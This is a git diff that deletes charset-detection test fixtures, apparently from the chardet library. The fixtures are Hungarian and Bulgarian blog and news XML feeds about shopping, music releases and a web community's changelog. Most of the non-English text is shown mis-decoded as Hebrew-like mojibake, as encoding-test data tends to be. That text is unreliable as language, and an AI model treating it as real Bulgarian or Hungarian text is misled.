    - - - --b- - -2005-12-18T18:43:00+01:00 -2005-12-18T17:50:39Z -2005-12-18T17:50:39Z - -tag:blogger.com,1999:blog-6504251.post-113492823964635548 -Be nem בll a szבnk... Ha visszafogjuk magunkat, la... - -
    Be nem בll a szבnk... Ha visszafogjuk magunkat, laza 40 perc a napi telefon adag, de nיha jף ףrבkig is beszיlni. (Kicsit sokבig tartott, de itt van, mבr יrzek.)
    -
    -false -
    - - - --b- - -2005-12-17T21:44:00+01:00 -2005-12-18T13:10:38Z -2005-12-17T20:47:22Z - -tag:blogger.com,1999:blog-6504251.post-113485244280500703 -A terv az volt, hogy ha viszonylag kיsőn, mondjuk ... - -
    A terv az volt, hogy ha viszonylag kיsőn, mondjuk תgy nyolc kצrl indulok el vבsבrolni, akkor mבr nem kell a tצmegtől tartani. Annyira nem jצtt be a dolog, fejvesztve rohant a tצmeg az ajבndיkok utבn.
    Viszont mיgis van mבr, aki kap tőlem is.
    -
    -false -
    - - - --b- - -2005-12-17T07:59:00+01:00 -2005-12-17T07:04:05Z -2005-12-17T07:04:05Z - -tag:blogger.com,1999:blog-6504251.post-113480304548149887 -Termיszetesen mבr reggel eszembe jutott nosztalgiב... - -
    Termיszetesen mבr reggel eszembe jutott nosztalgiבzni, tבvolbarיvedni az Astoriבnבl.
    Vיge a szorgalmi időszaknak, יs tessיk, mבr csak 5 tבrgyam van fggőben, hiבnyzף zh-k, hבzik miatt. Kellemes szombati program vבr ma is, pףt zh, igen.
    Egyelőre senki sem kap ajבndיkot.
    -
    -false -
    - - - --b- - -2005-12-11T13:13:00+01:00 -2005-12-11T12:13:58Z -2005-12-11T12:13:26Z - -tag:blogger.com,1999:blog-6504251.post-113430320678757984 -szerelmem - - - -
    szerelmem
    -
    -
    - -
    -
    -
    -false -
    - - - --b- - -2005-12-11T11:52:00+01:00 -2005-12-11T10:59:49Z -2005-12-11T10:58:08Z - -tag:blogger.com,1999:blog-6504251.post-113429868817467884 -Mבr tavaly is ilyen durva volt a karבcsinyi lבz? M... - -
    Mבr tavaly is ilyen durva volt a karבcsinyi lבz? Most előszצr komolyan elgondolkodtam a karבcsonyi ajבndיkok online beszerzיsיn. Aztבn vיgl mיgis fellkerekedik majd rajtam a trend, יs beבllok pבr ףrבra a sorba.
    -
    A Sony reklבm időkצzben mindenki kedvence lett, יn gyorsan mondom is mindenkinek, hogy amתgy Jose Gonzalez, igen igen, mindenki az albumot akarja.
    -
    -false -
    -
    diff --git a/chardet/tests/iso-8859-5-bulgarian/aero-bg.com.xml b/chardet/tests/iso-8859-5-bulgarian/aero-bg.com.xml deleted file mode 100644 index 121a025..0000000 --- a/chardet/tests/iso-8859-5-bulgarian/aero-bg.com.xml +++ /dev/null @@ -1,182 +0,0 @@ - - - - - - -aero-bg.com -ֲׂ׀ ױ BLOG בגא׀״ז׀ג׀ ׀ aero-bg.com. ֲד יױ ׁךװ׀ג דׁ״דׂ׀״ ״גױאױב״ ׀גא״׀״ גױ׀ג׀ - -tag:blogger.com,1999:blog-6604149 -2005-12-05T12:18:32Z -Blogger - -
    This is an Atom formatted XML site feed. It is intended to be viewed in a Newsreader or syndicated to another site. Please visit the Blogger Help for more info.
    -
    -true - - - -Emo - -2005-12-05T14:16:00+02:00 -2005-12-05T12:18:32Z -2005-12-05T12:18:32Z - -tag:blogger.com,1999:blog-6604149.post-113378511244448777 -¿אן׀ ׀ א׃א׀׀ - -
    ¿אױױ״ ב׀ א׃א׀״גױ ׀ דׁ "±װ״ °אג - ÷׀״" ״ ׀ ה״גױב "The Gym". -
    -
    -false -
    - - - -Emo - -2005-11-11T13:51:00+02:00 -2005-11-11T11:54:04Z -2005-11-11T11:54:04Z - -tag:blogger.com,1999:blog-6604149.post-113171004416265546 -¿אן׀ ׀ א׃א׀׀ - -
    ¿אױױ״ ב׀ א׃א׀״גױ ׀ גױ״ב דׁ "¼׀ױױׂ״" ״ ׀ דׁ "ֱ׀אג׀ 2000".
    -
    -false -
    - - - -Emo - -2005-11-08T20:22:00+02:00 -2005-11-08T18:51:25Z -2005-11-08T18:24:46Z - -tag:blogger.com,1999:blog-6604149.post-113147428604930447 -¿אן׀ ׀ א׃א׀׀ - - - -false - - - - -Emo - -2005-10-31T20:32:00+02:00 -2005-10-31T18:34:19Z -2005-10-31T18:34:19Z - -tag:blogger.com,1999:blog-6604149.post-113078365990884040 -¿אן׀ ׀ א׃א׀׀ - -
    ¿אױױ״ ב׀ א׃א׀״גױ ׀ דׁ "¼׀ױױׂ״", ׀ דׁ "±װ״ °אג - ÷׀״" ״ ׀ "The Gym".
    -
    -false -
    - - - -Emo - -2005-10-12T14:08:00+03:00 -2005-10-12T11:09:40Z -2005-10-12T11:09:40Z - -tag:blogger.com,1999:blog-6604149.post-112911538026206218 -´ׁ׀ׂױ׀ א׃א׀׀ - -
    ´ׁ׀ׂױ׀ ױ א׃א׀׀ג׀ ׀ דׁ "ֱ׀ׂ״ן ֱאגױב".
    -
    -false -
    - - - -Emo - -2005-10-11T14:41:00+03:00 -2005-10-11T11:44:10Z -2005-10-11T11:44:10Z - -tag:blogger.com,1999:blog-6604149.post-112903105022937470 -·׀ױבגׂ׀ױ - -
    ´ׁ׀ׂױ ױ ׂ ג׀ג ך ב״בך׀ בךב ׳׀ױבגׂ׀י״גױ ״בגאדגא״. ֲ׀׳״ ״״ז״׀ג״ׂ׀ ױי ױ אךװ׀ ׃ ג בך׳װ׀ׂ׀ױג ב״, װ׀ ײױ״ױג ׂ ׁךװױיױ װ׀ בג׀ױ -א׳ׂ.
    -
    -false -
    - - - -Emo - -2005-10-10T10:28:00+03:00 -2005-10-10T07:29:31Z -2005-10-10T07:29:31Z - -tag:blogger.com,1999:blog-6604149.post-112892937192243304 -¿אן׀ ׀ א׃א׀׀ - -
    ¿אױױ׀ ױ א׃א׀׀ג׀ ׀ דׁ "The Gym".
    -
    -false -
    - - - -Emo - -2005-09-10T11:44:00+03:00 -2005-09-20T11:13:56Z -2005-09-10T08:44:42Z - -tag:blogger.com,1999:blog-6604149.post-112634188258873174 -¿אז״׀״ ח׀בׂױ ׂ ׳׀׀ µ״׀ב - -
    ·׀׀ג׀ יױ אׂױװױ אז״׀ױ ח׀ב ¹׃׀-ד׀׳ (באג׀ ׃׀) ׀ 26.09.2005 ג 18.00 ח׀ב׀
    -
    -false -
    - - - -Emo - -2005-09-10T11:42:00+03:00 -2005-09-10T08:43:47Z -2005-09-10T08:42:44Z - -tag:blogger.com,1999:blog-6604149.post-112634176462361124 -¿אן׀ ׀ א׃א׀׀ - -
    ¿אױױ׀ ױ א׃א׀׀ג׀ ׀ דׁ "µ״׀ב".
    -
    -false -
    - - - -Emo - -2005-09-08T17:07:00+03:00 -2005-09-08T14:08:23Z -2005-09-08T14:08:23Z - -tag:blogger.com,1999:blog-6604149.post-112618850388044464 -¿אן׀ ׀ א׃א׀׀ - -
    ¿אױױ׀ ױ א׃א׀׀ג׀ ׀ דׁ "¼´ ֱאג" -
    -
    -false -
    -
    diff --git a/chardet/tests/iso-8859-5-bulgarian/bbc.co.uk.popshow.xml b/chardet/tests/iso-8859-5-bulgarian/bbc.co.uk.popshow.xml deleted file mode 100644 index e54c085..0000000 --- a/chardet/tests/iso-8859-5-bulgarian/bbc.co.uk.popshow.xml +++ /dev/null @@ -1,195 +0,0 @@ - - - - - BBC Bulgarian | ¿ ָד | Bulgarian Pop Show index - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/index.shtml - ·׀׀׳ױ׀ ׀א׀ ±±ֱ 2004 - bg - 2005-06-14T10:57:37+00:00 - ·׀׀׳ױ׀ ׀א׀ ±±ֱ 2004 : http://www.bbc.co.uk/bulgarian/institutional/rss.shtml#copyright - worldservice.com/bulgarian - hourly - 1 - 2005-06-14T10:57:37+00:00 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - http://www.bbc.co.uk/bulgarian/images/furniture/syndication/bbcbulgarian_180x80.gif - - - Michael Jackson א׀ׂװ׀ - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/06/050614_jackson_verdict.shtml - ִױׂױגױ ׀ ׳ׂױ׳װ׀ג׀ ״דׂ׀ו׀ ׂאױױ ׀ ׁןׂןׂ׀ױג ׀ װך׃ח׀ׂ׀׀ג׀ א״בךװ׀ - 2005-06-14T09:39:49+00:00 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - Live 8 װ א״ג״׀ - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/06/050614_live8_critic.shtml - ִאגױךג ׀ ׁא״ג ׃אד׀ג׀ Blur ״ ׂ׀ ׀ דןא״גױ Gorillaz, Damon Albarn, בױ ״׳׀׳׀ ב אױױׁאױײױ״ױ ׂװ ׀ ׁןׂױ״ן ג Bob Geldof זױאג Live 8 - 2005-06-14T09:55:07+00:00 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - ֱׁ׃ Destiny's Child - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/06/050614_destinys_child.shtml - R&B ׃אד׀ג׀ גׂךאװ״ בדוׂױגױ, חױ גא״גױ ׂ׀״בג״ ב׀ אױט״״ װ׀ גאך׃׀ג בׁבגׂױ ךג - 2005-06-14T10:04:49+00:00 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - ְױאװ ׳׀ Coldplay - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/06/050607_coldplay_review.shtml - ֱ ׂ״ן ב״ ׀ׁד X&Y, ׁא״ג׀ב׀ג׀ א ׁ׀װ׀ Coldplay בג׀ׂ״ ׂ אױאװ ׁא ׀ װ״בׂױ, אךח׀״ ׀ יױ אױװ״ ״׳״׳׀ױג ׀ ג׀ׂ׀ג׀ - 2005-06-07T12:21:44+00:00 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - ֱךװׁ׀ג׀ ׀ Jackson - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/06/050607_michael_jackson.shtml - ¿ךאׂ״ןג װױ ג ׁבךײװ׀״ןג׀ ׀ ײדא״ג ׂ אזױב׀ ׀ ׳ׂױ׳װ׀ג׀ ׳׀ׂךאט״ ׁױ׳ װ׀ בױ בג״׃ױ װ ׳׀מחױ״ױ - 2005-06-07T12:13:49+00:00 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - ½ׂ״ ג׀׀ג״ - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/05/050531_duke_spirit.shtml - ֱױװ װױׁמגג EP Roll, Spirit, Roll ג 2003, The Duke Spirit בױ ׀ׁ״ו׀ ׂ ג ׀ ד׳״׀״גױ א״ג״ז״ ׀ג ױװ׀ ג ׀-ׁױי׀ׂ׀י״גױ ׃אד״ ׀ ¾בגאׂ׀. ½ׂ״ןג ״ ׀ׁד א׀ׂװ׀ ח׀ׂ׀״ןג׀ - 2005-05-31T10:16:13+00:00 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - Live Aid ׂך׳אךבׂ׀ - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/05/050531_live_aid.shtml - »ױ׃ױװ׀א״גױ ׁ׀׃גׂא״גױ״ זױאג״ ג 80-גױ ׃װ״״ װ׀ׂ׀ג ׂװ ׳׀ אױב״בןױ ׀ א״׳ׂ׀״ױג ׀ ד׳״׀ג׀ - - 2005-05-31T09:46:22+00:00 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - Kinks ״״ Beatles? - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/05/050524_kinks_or_beatles.shtml - ½׀ ג׳״ ׂךאב ג׃ׂא װ׀װו׀ בדט׀גױ״גױ ׀ BBC Radio 2, ״ג ״׳ׁא׀ו׀ ׀-׃ױ״גױ ו״גׂױ ׳׀ בױװ״גױ 5 װױבױג״ױג״ן - 2005-05-24T10:42:32+00:00 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - ½ױדבא״ ÷א׀ - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/05/050524_elvispresley_guinness.shtml - Elvis Presley ׁױ אױװױױ ׳׀ ׀-אױדבױ״ןג ד׳״׀ג ׳׀ ׂב״ח״ ׂאױױ׀ ׂ ÷א׀בגׂג ג ֱׂױגׂ״גױ ְױאװ״ ׀ Guinness - 2005-05-24T10:29:30+00:00 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - ¾גׂ ׀ ךג - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/05/050517_rolling_stones.shtml - ½ױדא״״גױ Rolling Stones ׁןׂ״ו׀ ׀ׂױ ׳׀ ׃א גדאױ, ױג יױ ׳׀חױ ב 35 זױאג׀ ׂ ֹ׀ג״גױ ״ ÷׀׀װ׀ אױ׳ ׀ׂ׃דבג - 2005-05-17T10:39:03+00:00 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - Yahoo דא״א׀ Napster - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/05/050517_yahoo_napster.shtml - ¿אװ׀ײׁ׀ג׀, א׀׳ן׀ג׀ ״ בדט׀ױג ׀ ד׳״׀ ״גױאױג ׀ׁ״א׀ג ׂבױ ׂױחױ דןאבג ׂ בׂױג׀ - 2005-05-17T10:52:01+00:00 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - Billy Idol ׀ 50! - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/03/050331_idol.shtml - ¿ׂױחױ ג װױבױג״ױג״ױ בױװ בױװ״ן ב״ בגדװ״ױ ׀ׁד, א ׳ׂױ׳װ׀ג׀ Billy Idol ׀״ ׳׀ בךיױבגׂדׂ׀ױג ב״ - 2005-03-31T20:37:43+0000 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - ¼ד׳״׀ ׳׀ װדט׀ג׀ - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/03/050322_kaiser_chiefs.shtml - Rolling Stone, BBC, NME ב׀ ױװ״װדט״ \ No newline at end of file diff --git a/chardet/tests/iso-8859-5-bulgarian/bpm.cult.bg.2.xml b/chardet/tests/iso-8859-5-bulgarian/bpm.cult.bg.2.xml deleted file mode 100644 index 9e4ce3a..0000000 --- a/chardet/tests/iso-8859-5-bulgarian/bpm.cult.bg.2.xml +++ /dev/null @@ -1,186 +0,0 @@ - - - - - -beat counter (beat.log) -http://bpm.cult.bg/medusa/logs/?id=2 -<b>ֳװ׀א״ ׂ ״דגa</b><br /> -ְ׀׳... װׂ׀... א׀׳... װׂ׀... ¾גׁאןׂ׀ט ג׀גׂױגױ. ֲא׀ט ב א׀. ¿׀י׀ט בױ ׂ ד״ב ב מׁ״׀ג׀ ד׳״׀, ןג ךג״ ׂ בדט׀״גױ, ״׳בגאױׂ׀ בױ אױ׳ דט״גױ ״ בױ ׳׀ׁ״ׂ׀ ׂ ׂ׀ בױז״׀ ןבג ׂ ׳׀װ׀ג׀ ח׀בג ׀ ׳ך׀ ג״, חג״ ׀ ג״׀. ְ׀׳׀ײ״ ״ ׳׀ ד׳״׀ג׀ ׀ גׂן ײ״ׂג. ¸״ ױ ׀ בױװ״גױ װױבױג ״דג״.<br /> -<br /> -<b>÷׀ װ׀ דׁ״דׂ׀ גד?</b><br /> -1. ְױ׃״בגא״א׀ט בױ ׂ userlist-׀ ׀ ב׀ג׀;<br /> -2. ²בױ״ אױ׃״בגא״א׀ גאױׁ״גױ ײױ װ׀ דׁ״דׂ׀ ׂךׂ ׂב״ח ׁ׃ׂױ בׂױ ׂ Devzilla ״ Bazaar.<br /> -<br /> -<b>¿א׀ׂ״׀ ׳׀ דׁ״״ׂ׀ױ?</b><br /> -1. ½״׀ׂ״ ״ׂױ ך א׃א׀הב בךװךאײ׀״ױ! ֵ, גׂ׀ ׁױטױ ׳׀ װאד׃ ׃, ״ גד ױ א״ײ״.<br /> -2. ½ױ דׁ״דׂ׀גױ ״׳ׁא׀ײױ״ן, ״ג א׀׳ט״אןׂ׀ג א׀׀ג׀ ׀ ׃׀ - ״ ױ ׁ״ח׀ וא״׳ג׀ױ בא-ׁ׀א;<br /> -3. ¿דׁ״דׂ׀גױ ױװ״בגׂױ ״׳ׁא׀ײױ״ן ׂ jpg, png ״ gif הא׀ג. BMP ״ TIF ב׀ גג׀ ױא״׃װ״ ׳׀ web;<br /> -4. ½ױ דׁ״דׂ׀גױ ״׳ׁא׀ײױ״ן -׃ױ״ ג 10K. ±׃ׂױגױ ״ ׁױ׳ גׂ׀ ב׀ ׃א״;) -bg-bg -*bpm -1970-01-01T02:01:00+02:00 - - - - - - - - - - - - - - - - - -Mogwai - Mr. Beast -http://bpm.cult.bg/medusa/logs/?id=&pid=7624 -Mogwai - Mr. Beast]]> -Mogwai - Mr. Beast]]> -beat counter (beat.log) -atomant -2006-01-01T18:01:06+02:00 - - -Richard Cheese - - :: listen - -*respect - -²µֱµ»° ÷¾»µ´°... -http://bpm.cult.bg/medusa/logs/?id=&pid=7620 -
    -
    -Richard Cheese
    -
    - :: listen
    -
    -*respect
    -
    -²µֱµ»° ÷¾»µ´° ¸ ֳ¼½°ֲ° ;)]]>
    -
    -
    -Richard Cheese
    -
    - :: listen
    -
    -*respect
    -
    -²µֱµ»° ÷¾»µ´° ¸ ֳ¼½°ֲ° ;)]]>
    -beat counter (beat.log) -nmrp -2005-12-27T14:12:11+02:00 -
    - -Hot new stuff - ODORI... -http://bpm.cult.bg/medusa/logs/?id=&pid=7615 -Hot new stuff - ODORI 032
    -EVILJACK Vs KINK EP
    -
    -Copies are now in stock of this spelndid dancefloor selection. All the way from Bulgaria via Brighton, these two producers hooked up online and have both contributed tracks to this split 12.
    -KiNK ב אױ״׳ ׳׀ Odori (SWAG!!). 3ג ןבג ׂ acidhouse ח׀אג׀, ׀אױװ ב ׀׃ױג״ ג א׀׀ ׀ Jazzy eyewear, Martini Bros, Anders Ilar ״ John Dahlb׀ck..
    -±א׀ׂ ֱגא׀ו, ב גױׁ בױ!!
    -Kױױp pushin to the top bwoy!
    -(--¿ךאׂ ןבג ׂ ח׀אגׂױגױ, ן ;;))]]>
    -Hot new stuff - ODORI 032
    -EVILJACK Vs KINK EP
    -
    -Copies are now in stock of this spelndid dancefloor selection. All the way from Bulgaria via Brighton, these two producers hooked up online and have both contributed tracks to this split 12.
    -KiNK ב אױ״׳ ׳׀ Odori (SWAG!!). 3ג ןבג ׂ acidhouse ח׀אג׀, ׀אױװ ב ׀׃ױג״ ג א׀׀ ׀ Jazzy eyewear, Martini Bros, Anders Ilar ״ John Dahlb׀ck..
    -±א׀ׂ ֱגא׀ו, ב גױׁ בױ!!
    -Kױױp pushin to the top bwoy!
    -(--¿ךאׂ ןבג ׂ ח׀אגׂױגױ, ן ;;))]]>
    -beat counter (beat.log) -yme -2005-12-22T10:12:03+02:00 -
    - -גא״״ג״-ו ״ב ג Rםs. בגא׀וג... -http://bpm.cult.bg/medusa/logs/?id=&pid=7614 -״ב ג Rםs. בגא׀וג ׀בגאױ״ױ. via !title]]> -״ב ג Rםs. בגא׀וג ׀בגאױ״ױ. via !title]]> -beat counter (beat.log) -Lucash -2005-12-21T13:12:08+02:00 - - -Club "Don`t Panic" will open... -http://bpm.cult.bg/medusa/logs/?id=&pid=7612 - -½ױ ױ 100% ב״׃דא חױ ׀אג״ג ב ³א׀ג ´ױ יױ בױ בךבג״ ׀ 23-ג״, דׁחױג יױ גׂא״ ׂא׀ג״ א׀ ״״ ךב ״ יױ ן ״׳אׁׂ׀ױ ג׀׳״ soundsystem. ¾ח׀ׂ׀ ׃ ג ׂךאב״גױ, ױ״ג״ sound engeneers, so beware!!!]]> - -½ױ ױ 100% ב״׃דא חױ ׀אג״ג ב ³א׀ג ´ױ יױ בױ בךבג״ ׀ 23-ג״, דׁחױג יױ גׂא״ ׂא׀ג״ א׀ ״״ ךב ״ יױ ן ״׳אׁׂ׀ױ ג׀׳״ soundsystem. ¾ח׀ׂ׀ ׃ ג ׂךאב״גױ, ױ״ג״ sound engeneers, so beware!!!]]> -beat counter (beat.log) -yme -2005-12-20T21:12:01+02:00 - - -Kattoo - Megrim -... -moreover: -Beefcake; Kattoo; -http://bpm.cult.bg/medusa/logs/?id=&pid=7611 -Kattoo - Megrim
    -...
    -moreover:
    -Beefcake; Kattoo;]]>
    -Kattoo - Megrim
    -...
    -moreover:
    -Beefcake; Kattoo;]]>
    -beat counter (beat.log) -atomant -2005-12-19T22:12:07+02:00 -
    - -tonight - lost in dub... -http://bpm.cult.bg/medusa/logs/?id=&pid=7607 - - -beat counter (beat.log) -yme -2005-12-15T13:12:38+02:00 - - -Artery - Take It From... -http://bpm.cult.bg/medusa/logs/?id=&pid=7600 - -׃ ױ ך״ ג'ׂ׀ ׀אחױ, ׀ ״׀ ׃ ״׀ ׀ ֱגאױײ׀]]> - -׃ ױ ך״ ג'ׂ׀ ׀אחױ, ׀ ״׀ ׃ ״׀ ׀ ֱגאױײ׀]]> -beat counter (beat.log) -Tcmendor -2005-12-13T15:12:53+02:00 - - -"ך״¼ ׀״, בױ אױב״א׀-׀ -״ ׂ... -http://bpm.cult.bg/medusa/logs/?id=&pid=7599 - -״ ׂ א״ב׀ך ׁ״׀-׀"
    -ױ, ױ?]]>
    - -״ ׂ א״ב׀ך ׁ״׀-׀"
    -
    ױ, ױ?]]> -beat counter (beat.log) -yme -2005-12-13T13:12:34+02:00 -
    - -¿א״ןג׀ג׀ ״׳ױ׀װ׀ ג בױװ״ן בױג... -http://bpm.cult.bg/medusa/logs/?id=&pid=7596 -C&M productions ױ ׳׀ג ״ מׁ״ ׃׀ב - ±ױב׀ׂ׀. ַ׀בג ג ׂךאב״ן בױג ױ ױװ״ ג ׳׀״ב״גױ ׳׀ Casa Flava ׂ ¼׀ן״ - I know. ¸ אױװױױ ב״ ׳׀בדײ׀ׂ׀ א׀׳וװ׀ג׀ װ ב׀ג׀. ]]>
    -C&M productions ױ ׳׀ג ״ מׁ״ ׃׀ב - ±ױב׀ׂ׀. ַ׀בג ג ׂךאב״ן בױג ױ ױװ״ ג ׳׀״ב״גױ ׳׀ Casa Flava ׂ ¼׀ן״ - I know. ¸ אױװױױ ב״ ׳׀בדײ׀ׂ׀ א׀׳וװ׀ג׀ װ ב׀ג׀. ]]> -beat counter (beat.log) -snark -2005-12-12T18:12:01+02:00 -
    -
    diff --git a/chardet/tests/iso-8859-5-bulgarian/bpm.cult.bg.4.xml b/chardet/tests/iso-8859-5-bulgarian/bpm.cult.bg.4.xml deleted file mode 100644 index e62acd5..0000000 --- a/chardet/tests/iso-8859-5-bulgarian/bpm.cult.bg.4.xml +++ /dev/null @@ -1,89 +0,0 @@ - - - - - -cybertech corp. (tech.log) -http://bpm.cult.bg/medusa/logs/?id=4 -<b>¸׀ בׂױג״׀ ׂ גדױ׀!</b><br /> -¿אױוװךג ג homo sapiens ך robo sapiens ױ גאדװױ ״ ׁ׀ׂױ. ½ױ׀ ד ׃ױ :) ¿בױװ״גױ ׂבג״ ג בׂױג׀ ׀ ׂ״ב״גױ גױו׃״״. ¼׀״ גױױה״, ׃ױ״ ױא׀״, ׀ח״ׂױ, ׁ״מגא״, ׂ״ׁא׀גא״ בךב בךחױׂ׀ ׁ׀גױא״ן - גױ׳״ ״ יױ ׃ װאד׃״ ״׳ױ׀װ״ ג ׁךװױיױג - גד ״ בױ׃׀ ׀ ׂ״ זױ׀.<br /> -<br /> -<b>÷׀ װ׀ דׁ״דׂ׀ גד?</b><br /> -1. ְױ׃״בגא״א׀ט בױ ׂ userlist-׀ ׀ ב׀ג׀;<br /> -2. ²בױ״ אױ׃״בגא״א׀ גאױׁ״גױ ײױ װ׀ דׁ״דׂ׀ ׂךׂ ׂב״ח ׁ׃ׂױ בׂױ ׂ Devzilla ״ Bazaar.<br /> -<br /> -<b>¿א׀ׂ״׀ ׳׀ דׁ״״ׂ׀ױ?</b><br /> -1. ½״׀ׂ״ ״ׂױ ך א׃א׀הב בךװךאײ׀״ױ! ֵ, גׂ׀ ׁױטױ ׳׀ װאד׃ ׃, ״ גד ױ א״ײ״.<br /> -2. ½ױ דׁ״דׂ׀גױ ״׳ׁא׀ײױ״ן, ״ג א׀׳ט״אןׂ׀ג א׀׀ג׀ ׀ ׃׀ - ״ ױ ׁ״ח׀ וא״׳ג׀ױ בא-ׁ׀א;<br /> -3. ¿דׁ״דׂ׀גױ ױװ״בגׂױ ״׳ׁא׀ײױ״ן ׂ jpg, png ״ gif הא׀ג. BMP ״ TIF ב׀ גג׀ ױא״׃װ״ ׳׀ web;<br /> -4. ½ױ דׁ״דׂ׀גױ ״׳ׁא׀ײױ״ן -׃ױ״ ג 10K. ±׃ׂױגױ ״ ׁױ׳ גׂ׀ ב׀ ׃א״;) -bg-bg -*bpm -1970-01-01T02:01:00+02:00 - - - - - - - - - - - - - - - - - -Quantum Trickery: Testing Einstein's Strangest... -http://bpm.cult.bg/medusa/logs/?id=&pid=7622 -Quantum Trickery: Testing Einstein's Strangest Theory
    -
    -ױ, ױ ײ׀ו װ׀ בױ ׂך׳װךאײ׀, בא״ :)]]>
    -Quantum Trickery: Testing Einstein's Strangest Theory
    -
    -ױ, ױ ײ׀ו װ׀ בױ ׂך׳װךאײ׀, בא״ :)]]>
    -cybertech corp. (tech.log) -mims -2005-12-30T00:12:25+02:00 -
    - -ן ׳׀ױ ״ ׀ ׀׃׀׳״... -http://bpm.cult.bg/medusa/logs/?id=&pid=7619 - -ױ דבןו װ׀ ׀ױאן בׂױבגױ ׀ג׀׃ ב ׀ אךח״.]]> - -ױ דבןו װ׀ ׀ױאן בׂױבגױ ׀ג׀׃ ב ׀ אךח״.]]> -cybertech corp. (tech.log) -supudo -2005-12-25T14:12:24+02:00 - - -¸״ז״׀ג״ׂ׀ג׀ ׀ ׂױ׀: -One Laptop Per... -http://bpm.cult.bg/medusa/logs/?id=&pid=7556 -
    -
    -¸״ז״׀ג״ׂ׀ג׀ ׀ ׂױ׀:
    -One Laptop Per Child
    -
    -°ױא״׀ב׀ הװ׀ז״ן יױ ״ג׀ װ׀ ב״׃דא״ ׀ 150 ״״׀ װױז׀ ׀ג״ ׀ זױ׀ $100. °אױ װ׀ ׂ״װ״.]]>
    -
    -
    -¸״ז״׀ג״ׂ׀ג׀ ׀ ׂױ׀:
    -One Laptop Per Child
    -
    -°ױא״׀ב׀ הװ׀ז״ן יױ ״ג׀ װ׀ ב״׃דא״ ׀ 150 ״״׀ װױז׀ ׀ג״ ׀ זױ׀ $100. °אױ װ׀ ׂ״װ״.]]>
    -cybertech corp. (tech.log) -ivgin -2005-11-17T12:11:33+02:00 -
    - -Looks like the revolution with... -http://bpm.cult.bg/medusa/logs/?id=&pid=7553 - - - - - -devzilla (dev.log) -http://bpm.cult.bg/medusa/logs/?id=9 -<b>±׀ג״גױ</b><br /> -½״ױ בױ ׀א״׳״ ״ ךא׳ױ״ׂ״ ״חׂױ, ״ג ג ׂאױױ ׀ ׂאױױ א׀ׂןג *bpm ׳׀ ױה. ° בדח׀ ב״ ן ג בױװ״גױ *bpm וױװׂױ, אױהאױטׂ׀ ג׳״ ׃ ױײױװױׂ, ׳׀יג גד דׁ״דׂ׀ױ ׂ״גױ הדז״״ ׀ מׁ״״ן ג״ ב׀ג. ֱךי ״ ׀ׂ״ ב׀ בא׀״גױ ד ׂךט״.<br /> -<br /> -<b>÷׀ װ׀ דׁ״דׂ׀ גד?</b><br /> -1. ½ױ ײױט... גד דׁ״דׂ׀ג ב׀ א׀׳א׀ׁגח״ז״גױ ׀ <b>*bpm</b>.<br /> -<br /> -<b>¿א׀ׂ״׀ ׳׀ דׁ״״ׂ׀ױ?</b><br /> -1. ֹױ ב״ דׁ״דׂ׀ױ ׀ׂג ״ב׀ױ. ½׀-׀. -bg-bg -*bpm -1970-01-01T02:01:00+02:00 - - - - - - - - - - - - - - - - - -*bpm 5 (medusa 0.6.9 :... -http://bpm.cult.bg/medusa/logs/?id=&pid=7487 -*bpm 5 (medusa 0.6.9 : forum enhancments)
    -+ וױװךא ׀אג״׀ ׳׀ ׂבױ״ האד/װד (Lucash/ivgin/spud)]]>
    -*bpm 5 (medusa 0.6.9 : forum enhancments)
    -+ וױװךא ׀אג״׀ ׳׀ ׂבױ״ האד/װד (Lucash/ivgin/spud)]]>
    -devzilla (dev.log) -supudo -2005-10-13T14:10:22+02:00 -
    - -*bpm 5 (medusa 0.6.8 :... -http://bpm.cult.bg/medusa/logs/?id=&pid=7013 -*bpm 5 (medusa 0.6.8 : no-mu-night)
    -מ׳ךאב״ן אה״ ױ ךװױג׀ג באן ׂ״ן װ״׳׀ ׀ מ׳ךא ״בג׀
    -(kaladan/spud/webcrusader)]]>
    -*bpm 5 (medusa 0.6.8 : no-mu-night)
